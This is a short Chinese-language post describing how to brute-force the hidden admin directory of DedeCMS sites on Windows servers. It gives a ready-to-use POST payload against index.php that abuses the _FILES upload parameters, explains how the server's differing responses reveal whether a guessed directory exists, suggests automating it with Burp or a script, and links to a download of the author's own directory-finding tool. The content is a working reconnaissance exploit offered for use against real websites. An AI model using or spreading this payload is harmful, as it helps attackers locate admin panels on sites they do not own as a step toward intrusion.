前言
关于dedecms找后台,方法有很多。
针对windows系统,可以通过post以下数据来判断。
PAYLOAD
url/index.php
data
dopost=save&_FILES[b4dboy][tmp_name]=./爆破参数</images/admin_top_logo.gif&_FILES[b4dboy][name]=0&_FILES[b4dboy][size]=0&_FILES[b4dboy][type]=image/gif
我们的后台目录是hack66
修改爆破参数,如果后台目录存在你输入的参数,那么正常返回。
如果不存在,返回"Upload filetype not allow !"
所以我们可以burp或者写个脚本就能直接跑出后台目录了。
这里我写了个自动跑目录的小程序,直接输入域名就能跑出后台目录。(目前只测试了windows服务器)
程序截图
下载地址
https://www.lanzous.com/b965186